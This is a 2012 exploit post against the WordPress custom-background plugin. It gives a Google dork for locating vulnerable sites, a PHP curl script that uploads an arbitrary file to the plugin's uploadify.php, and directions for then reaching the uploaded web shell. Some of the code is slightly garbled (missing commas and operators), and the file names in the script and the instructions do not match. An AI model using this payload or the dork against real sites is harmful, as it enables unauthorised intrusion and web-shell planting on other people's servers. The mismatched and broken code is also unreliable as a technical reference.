facebook facebook twitter rss

wordpress custom-background plugin file upload vulnerability

Author: Tunisian spl01t3r , Published: 11-06-2012
+----------------------------------------------------------------------+
# Exploit Title: wordpress custom-background plugin file upload vulnerability
# Google Dork: inurl:/wp-content/plugins/custom-background
# Date: 10/06/2012
# Author: Tunisian spl01t3r
# Software Link: http://downloads.wordpress.org/plugin/custom-background.zip

____ (_) ____ ___
( _ \| |( _ \ / _ \
| | | | || | | x |_|
| ||_/|_|| ||_/ \___/
|_| |_|
_
(_) ____ ____ ____ _____
| | / __| / __| \__ \ / ` \
| | \___ \ \___ \ / _ \_ | Y Y \
|_| |____/ |____/ (___ / |_|_| /
\/ \/
+----------------------------------------------------------------------+

[+] exploit

<?php
$uploadfile
="C:\AppServ\www\lo.php";
$ch =
curl_init("http://www.exemple.com/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
         array(
'Filedata'=>"@$uploadfile"
'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult"
?>


[+] how TO use
Tunisia.php must be the devil file 3:)
!!!shell!!!
Shell Access :
/wp-content/plugins/custom-background/uploadify/ $postResult output
else
/wp-content/uploads/ $postResult output
+----------------------------------------------------------------------+
[+] greetz to : BIbou sfaxien ; mech lazem ; tn_scorpion ; anas laaribi ;
jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
daly azrail ; med bradai ; 7rouz ; ghazy info ; mohamed bel ;
hassen ben mbarek ; prince bibou ; hag whag ; anis van toets
Safoine sassi ; DR.hsm ; HAMdi matador....
& all tn_spl01t3r's freinds
mAhna mAhna

[+] profile : www.facebook.com/TN.spl0it3r

+----------------------------------------------------------------------+

Like us on Facebook :